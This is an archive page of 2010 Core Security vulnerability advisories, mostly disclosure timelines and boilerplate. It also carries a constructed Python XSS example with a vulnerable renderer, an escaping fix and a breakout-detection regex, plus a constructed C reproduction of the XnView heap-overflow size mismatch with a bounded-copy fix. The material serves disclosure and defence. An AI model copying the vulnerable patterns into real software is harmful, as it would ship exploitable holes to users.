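    reflected value can no longer close the attribute and start an onMouseOver one."""
    return '<input type="text" name="searchString" value="%s">' % html.escape(
        search_string, quote=True)


class _FirstInputAttrs(HTMLParser):
    """Collect the attributes of the first <input> tag as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)  # attribute names arrive lowercased


def parsed_attributes(markup: str) -> dict:
    """Return the first <input> tag's attributes; a breakout shows up as an on* key."""
    parser = _FirstInputAttrs()
    parser.feed(markup)
    return parser.attrs or {}


# Detection heuristic (constructed): a decoded value that closes a quote and names an
# on* event handler, or that introduces a javascript: URL or a <script> tag.
_BREAKOUT = re.compile(r'''["'][^"'<>]*\bon[a-z]+\s*=|javascript\s*:|<\s*script''', re.I)


def flag_request(url: str) -> list:
    """Names of query parameters whose decoded value matches the breakout pattern.
    Every parameter is checked whatever the actionId, because the Search action
    redirects to showList and the payload is logged against the former."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(_BREAKOUT.search(v) for v in values))


if __name__ == "__main__":
    reflected = search_string_from(SAMPLE_URL)
    print("vulnerable:", parsed_attributes(render_vulnerable(reflected)))
    print("hardened:  ", parsed_attributes(render_hardened(reflected)))
    print("flagged:   ", flag_request(SAMPLE_URL))
```

The fix shown is output encoding for the attribute context (html.escape with quote=True); the log check is a heuristic that catches the payload shape in the advisory and will miss encodings it does not decode, so treat a hit as a trigger for review rather than proof of exploitation.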

[Full-disclosure] [CORE-2010-0728] Symantec Intel Handler Service Remote Denial-of-Service

2010-12-13 Thread Core Security Technologies Advisories
 of
the initial report of the vulnerability.

. 2010-09-09:
After two weeks with no replies, Core again requests the date of the
initial report of the vulnerability, and asks if the release of the fix
is still on track for the end of September.

. 2010-09-16:
Vendor replies that they will not be able to release fixes before the
end of the year, as they have to correct third-party code by themselves.

. 2010-09-21:
Core requests confirmation that the vendor won't release a fix before
the end of the year.

. 2010-09-22:
Vendor confirms that they won't be able to release fixes until the end
of the year, as fixing third-party code is taking time. However, the
vendor explains that current versions of the product have the vulnerable
functionality disabled, that old versions of the product do not install
the vulnerable functionality by default, and that installation of this
functionality is not recommended.

. 2010-10-05:
Core requests version numbers for vulnerable and non-vulnerable versions
of the software, and asks if vulnerable users can update to a
non-vulnerable version.

. 2010-09-06:
Vendor replies with the version numbers and confirms that vulnerable
users have to wait for the patch.

. 2010-10-07:
Core decides to push the release date forward and wait for the release
of the patch.

. 2010-10-22:
Core asks Symantec for a precise release date for the fixes, and
explains that the publication of the advisory won't be pushed further
than December 2010.

. 2010-10-23:
Vendor replies that the last known date was during December, and that
they will confirm a firmer date.

. 2010-11-01:
Core asks Symantec if a firmer release date has been confirmed.

. 2010-11-03:
Vendor replies that the engineering team has not confirmed a release
date, and asks if Core can hold the publication of the advisory until
the end of the year.

. 2010-11-25:
Core replies that the December 13th release date is fixed, and requests
an update on the status of the patches.

. 2010-12-13:
No update received, advisory CORE-2010-0728 is published.



10. *References*




11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/].


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk0GR4UACgkQyNibggitWa1iKQCfYtzFZOnNGpclzNZEDrwM08wr
gwsAn2UYlqC0+IpliLAVTn/ItK4Sc3ne
=Up/o
-END PGP SIGNATURE-



[Full-disclosure] CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net

2010-11-30 Thread CORE Security Technologies Advisories
 information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

[Full-disclosure] CORE-2010-1018 - Landesk OS command injection

2010-11-10 Thread CORE Security Technologies Advisories
 team notifies the version numbers of the affected and patched
versions, and also sends the workaround mentioned in the [Sec. 6].

. 2010-11-08:
LANDesk team requests to postpone the advisory publication for 24 hours
given that they are unable to be ready by that time.

. 2010-11-09:
Core re-schedules the advisory publication to November 10th.

. 2010-11-10:
The advisory CORE-2010-1018 is published.



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

[Full-disclosure] [CORE-2010-0825] Apple OS X ATSServer CFF CharStrings INDEX Sign Mismatch

2010-11-08 Thread CORE Security Technologies Advisories
 of publication.

. 2010-08-31:
Apple asks Core about credit information for the advisory.

. 2010-09-28:
Core acknowledges the communication sending the credit information for
this report.

. 2010-10-20:
Core asks Apple for a firm date for the release of this security issue
since the initial proposed timeframe of October 18th is due.

. 2010-10-22:
Apple acknowledges the communication informing that the publication date
is scheduled to the week of October 25th. Also, Apple notifies that the
assigned identifier for this vulnerability is CVE-2010-1797.

. 2010-11-01:
Core asks Apple for a new schedule for the publication, since there was
no notice of any Apple security update during the week of October 25th.

. 2010-11-01:
Apple acknowledges the communication informing that the publication date
was rescheduled to the middle of the week of November 1st.

. 2010-11-03:
Core informs Apple that the publication of this advisory was scheduled
to Monday 8th, taking into account the last communication this is a
final publication date. Core also informs that the information about how
this vulnerability was found and how it can be exploited will be
discussed in a small infosec related local event in Buenos Aires city.

. 2010-11-08:
Core publishes advisory CORE-2010-0825.




10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [CORE-2010-0819] LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form

2010-10-20 Thread CORE Security Technologies Advisories
 developers of libsmi, Juergen Schoenwaelder and
Frank Strauss.

. 2010-09-07:
Core Security Technologies contacts Juergen Schoenwaelder and Frank
Strauss at their supplied e-mail addresses, telling them about a found
vulnerability and offering an advisory draft in either plain or
encrypted form.

. 2010-09-07:
Frank Strauss' e-mail address bounces Core Security Technologies'
e-mail back, informing about a new e-mail address. Core Security
Technologies sends the message again to the new address.

. 2010-09-07:
Juergen Schoenwaelder replies with his PGP keys, and copies Vincent
Bernat again in the conversation.

. 2010-09-09:
Core Security Technologies sends an encrypted draft of this advisory
to Juergen Schoenwaelder and Vincent Bernat, with apologies for the
delay caused by Pedro Varangot
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Pedro_Varangot]
being on leave due to health issues. The advisory draft mentions
Net-SNMP as possibly vulnerable software.

. 2010-09-11:
Juergen Schoenwaelder replies with a patch fixing the vulnerability,
and corrects some technical information in the advisory draft
regarding the impact of the vulnerability, stating that it is likely
low and that Net-SNMP is not affected.

. 2010-09-27:
Core Security Technologies replies to Juergen Schoenwaelder and
Vincent Bernat agreeing that the impact of the vulnerability is low
and removes the mention of Net-SNMP from the advisory. Core Security
Technologies asks for a timeline regarding the release of a fixed
version of libsmi, stating that this advisory will be released anyway,
because someone may be using libsmi in their software, introducing a
vulnerability they may not know about. No reply is received to this
e-mail.

. 2010-10-04:
Core Security Technologies notifies Juergen Schoenwaelder and Vincent
Bernat that October the 18th has been set as a tentative release date
for this advisory, and that the release date is open to discussion if
commitment to release a fixed version of libsmi in a given timeframe
is given.

. 2010-10-08:
Juergen Schoenwaelder replies with suggestions for the vulnerable
packages and vendor information sections of this advisory. He also
mentions that Core Security Technologies should go with the October
18th release date for this advisory.

. 2010-10-08:
Core Security Technologies incorporates Juergen Schoenwaelder's
suggestions into the advisory, and again mentions that the advisory can
be rescheduled if the vendor deems it necessary.

. 2010-10-20:
Advisory CORE-2010-0819 is released.


10. *References*

[1] [http://www.ibr.cs.tu-bs.de/projects/libsmi/]
[2] [http://www.ibr.cs.tu-bs.de/projects/libsmi/libsmi.html]


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].


[Full-disclosure] CORE-2010-0517 - Microsoft Office HtmlDlgHelper class memory corruption

2010-10-14 Thread CORE Security Technologies Advisories
 comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].


[Full-disclosure] [CORE-2010-0624] MS OpenType CFF Parsing Vulnerability

2010-10-12 Thread Core Security Technologies Advisories
, and confirms that the vulnerability
is locally exploitable.

. 2010-10-12:
Advisory CORE-2010-0624 is published.


10. *References*


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].


[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability

2010-10-06 Thread CORE Security Technologies Advisories
 of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://www.coresecurity.com/corelabs].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] [CORE-2010-0623] Microsoft Windows CreateWindow function callback vulnerability

2010-08-10 Thread CORE Security Technologies Advisories
:
Core asks Microsoft for data regarding their future security bulletin
in order to include it in the vendor section of this advisory.

. 2010-08-04:
Microsoft replies with the data Core asked for, and mentions that, if
possible, they would like to see an advisory draft. Microsoft also
asks for confirmation on credits for the acknowledgement section of
their report.

. 2010-08-04:
Core replies with a draft of this advisory and a minor correction
regarding an accent mark on the credits for the acknowledgement section.

. 2010-08-09:
Core sends a more polished draft for the advisory.

. 2010-08-10:
Microsoft acknowledges the advisory draft and the minor correction
regarding the accent mark.

. 2010-08-10:
Microsoft Security Bulletin MS10-048 is published.

. 2010-08-10:
Advisory CORE-2010-0623 is published.


10. *References*

[1] Microsoft Security Bulletin MS10-032
[http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx]


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] CORE-2010-0407: Microsoft Office Excel PivotTable Cache Data Record Buffer Overflow

2010-08-10 Thread CORE Security Technologies Advisories
. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-08-06 Thread Core Security Technologies Advisories

  Core Security Technologies - CoreLabs Advisory
   http://corelabs.coresecurity.com/

Adobe Director DIRAPI.DLL Invalid Read Vulnerability

Additional research on this vulnerability was performed by Core Security
Technologies researchers. Updated technical information has been
published at:

http://www.coresecurity.com/content/adobe-director-memory-corruption



[Full-disclosure] [CORE-2010-0608] HP OpenView NNM OvJavaLocale Buffer Overflow Vulnerability

2010-08-03 Thread CORE Security Technologies Advisories
 to determine if current security investments are detecting and 
preventing attacks. Core Security Technologies augments its leading technology 
solution with world-class security consulting services, including penetration 
testing and software security auditing. Based in Boston, MA and Buenos Aires, 
Argentina, Core Security Technologies can be reached at 617-399-6980 or on the 
Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security Technologies 
and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution 
Non-Commercial Share-Alike 3.0 (United States) Licence: 
[http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies 
advisories team, which is available for download at 
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] CORE-2010-0316 - Novell iManager Multiple Vulnerabilities

2010-06-23 Thread CORE Security Technologies Advisories
 that it was
published for about 20 minutes. Core also notifies that there will be a
meeting of the Core Advisories Team tomorrow (Thursday 3rd) at 19:30 GMT
to evaluate this case. If the iManager team does not intend to release
patches by then, there is no good reason to postpone the advisory
publication until August 2010.

. 2010-06-03:
The iManager team notifies the plan to release a 2.7.3 ftf4 to fix
these 2 issues and another issue. iManager 2.7.3 ftf4 would be
released before August, but there is no date yet.

. 2010-06-03:
Core agrees to postpone the advisory publication while waiting for the
2.7.3 ftf4 release. The advisory is rescheduled for publication on
Monday, June 21st, 2010. Core notifies that this date can be moved if
the iManager team needs it, but the iManager team should provide a clear
report on the progress of the fix in order to request moving the
release date.

. 2010-06-15:
Core requests a status update to the iManager team.

. 2010-06-17:
Core requests a status update to the iManager team and notifies the
advisory will be released next Monday as planned.

. 2010-06-18:
The iManager team notifies they are waiting on a response from another
Novell product that ships with iManager, to make sure they will also
be able to consume the new version of iManager and release before
August. The iManager team also notifies they will contact Core with
the timeline today.

. 2010-06-23:
The advisory CORE-2010-0316 is published.



10. *References*

[1] Novell iManager:
[http://www.novell.com/products/consoles/imanager/overview.html].


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://www.coresecurity.com/corelabs].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] CORE-2010-0514: XnView MBM Processing Heap Overflow

2010-06-14 Thread CORE Security Technologies Advisories
 41 41 41 41 41
01355648  41 41 41 41 41 41 41 41 EE FE EE FE EE FE EE FE

- -/


The error is the following: since it copies DWORDs, instead of copying
0x1E bytes, it should have copied 0x0F bytes (0x1E / 2). Finally, the
heap block is allocated in this part of the code:

/-
005AC5F7   56              PUSH ESI                                // Heap Size
005AC5F8   6A 08           PUSH 8                                  // HEAP_ZERO_MEMORY
005AC5FA   FF35 A4347900   PUSH DWORD PTR DS:[7934A4]              // Heap
005AC600   FF15 84726E00   CALL DWORD PTR DS:[KERNEL32.HeapAlloc]  ; ntdll.RtlAllocateHeap

- -/
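An added C example, constructed for this page rather than taken from XnView, of the size mismatch the advisory describes: a section's byte length is passed straight through as the count for a loop that copies multi-byte units, so the copy writes past the heap block that was allocated for exactly that many bytes. The section layout (2-byte little-endian length followed by data), the 2-byte copy unit (which gives the advisory's 0x1E bytes to 0x0F units) and all function names are assumptions; the bounded copy shows the check the vulnerable loop lacks.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Constructed example, not XnView code. A minimal paint-data section is
 * assumed to be a 2-byte little-endian length (in bytes) followed by that
 * many bytes of pixel data. The decoder allocates a heap block of exactly
 * that many bytes and then copies the data in COPY_UNIT-byte units. Using
 * the byte length directly as the unit count is the mismatch the advisory
 * describes; the fix derives the unit count from the byte length, and the
 * copy is bounded by both the destination block and the input.
 */

#define COPY_UNIT 2u   /* assumed unit size: 0x1E bytes -> 0x0F units */

/* Number of COPY_UNIT-sized elements that make up `byte_len` bytes. */
size_t units_for_bytes(size_t byte_len)
{
    return byte_len / COPY_UNIT;
}

/*
 * Bounded unit copy: copies `count` units from src to dst and returns the
 * number of bytes written, or 0 if the copy would overrun either buffer.
 * This is the check the vulnerable copy loop does not perform.
 */
size_t copy_units_checked(uint8_t *dst, size_t dst_len,
                          const uint8_t *src, size_t src_len, size_t count)
{
    if (count > SIZE_MAX / COPY_UNIT)      /* count * COPY_UNIT would wrap */
        return 0;
    size_t need = count * COPY_UNIT;
    if (need > dst_len || need > src_len)  /* heap overflow or over-read */
        return 0;
    memcpy(dst, src, need);
    return need;
}

/*
 * Parses one section and copies its pixel data into a freshly allocated,
 * zeroed heap block of `declared_len` bytes (the HeapAlloc(size) pattern in
 * the advisory's disassembly). With count_in_bytes != 0 the declared byte
 * length is used as the unit count (the bug); otherwise the unit count is
 * derived from it. Returns the bytes copied, or 0 when the input is
 * malformed or the copy is rejected. *out receives the block (caller frees)
 * only on success.
 */
size_t decode_section(const uint8_t *buf, size_t buf_len,
                      int count_in_bytes, uint8_t **out)
{
    *out = NULL;
    if (buf_len < 2)
        return 0;
    size_t declared_len = (size_t)buf[0] | ((size_t)buf[1] << 8);
    const uint8_t *data = buf + 2;
    size_t data_len = buf_len - 2;
    if (declared_len == 0)
        return 0;

    uint8_t *block = calloc(declared_len, 1);
    if (block == NULL)
        return 0;

    size_t count = count_in_bytes ? declared_len : units_for_bytes(declared_len);
    size_t copied = copy_units_checked(block, declared_len, data, data_len, count);
    if (copied == 0) {
        free(block);
        return 0;
    }
    *out = block;
    return copied;
}

/* Builds a constructed section: `declared_len` header, `payload_len` bytes of 0x41. */
size_t build_sample_section(uint8_t *buf, size_t buf_len,
                            uint16_t declared_len, size_t payload_len)
{
    if (buf_len < 2 + payload_len)
        return 0;
    buf[0] = (uint8_t)(declared_len & 0xFF);
    buf[1] = (uint8_t)(declared_len >> 8);
    memset(buf + 2, 0x41, payload_len);
    return 2 + payload_len;
}

int main(void)
{
    uint8_t section[2 + 0x1E];
    uint8_t *block = NULL;
    size_t n = build_sample_section(section, sizeof section, 0x1E, 0x1E);

    /* Bug: 0x1E units of 2 bytes = 0x3C bytes into a 0x1E-byte block. */
    size_t bad = decode_section(section, n, 1, &block);
    printf("byte length used as unit count: %s\n",
           bad ? "copied" : "rejected, would overflow the heap block");

    /* Fix: 0x0F units of 2 bytes = 0x1E bytes, exactly the block size. */
    size_t good = decode_section(section, n, 0, &block);
    printf("unit count derived from byte length: copied %zu bytes\n", good);
    free(block);
    return 0;
}
```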



9. *Report Timeline*

. 2010-05-27:
Core Security Technologies notifies XnView of the vulnerability.

. 2010-05-27:
The XnView author acknowledges receipt of the notification.

. 2010-05-27:
Core sends a technical description of the vulnerability, and a
Proof-of-Concept file that triggers the bug.

. 2010-05-28:
The XnView author notifies Core that the vulnerability has been fixed,
and that a fixed version will be released.

. 2010-06-02:
Core asks XnView when the fixed version will be released, in order to
coordinate the publication of the advisory with the release of a fixed
version.

. 2010-06-03:
The XnView author responds that version 1.97.5 will be available in 2
weeks.

. 2010-06-03:
Core requests a more precise date for the release, and reschedules
publication of its advisory to June 14th, 2010.

. 2010-06-07:
The XnView author responds that the update will be available on June 14th.

. 2010-06-10:
Core sends a second Proof-of-Concept, and asks the XnView author if it
triggers a different vulnerability.

. 2010-06-11:
The XnView author responds that the second PoC triggers the same
vulnerability.

. 2010-06-14:
Advisory CORE-2010-0514 is published.



10. *References*

[1] XnView website
[http://www.xnview.com/]
[2] Proof of Concept files
[http://www.coresecurity.com/files/attachments/CORE-2010-0514-Xnview-PoCs.rar]
[3] MBM file format
[http://software.frodo.looijaard.name/psiconv/formats/MBM_File.html]
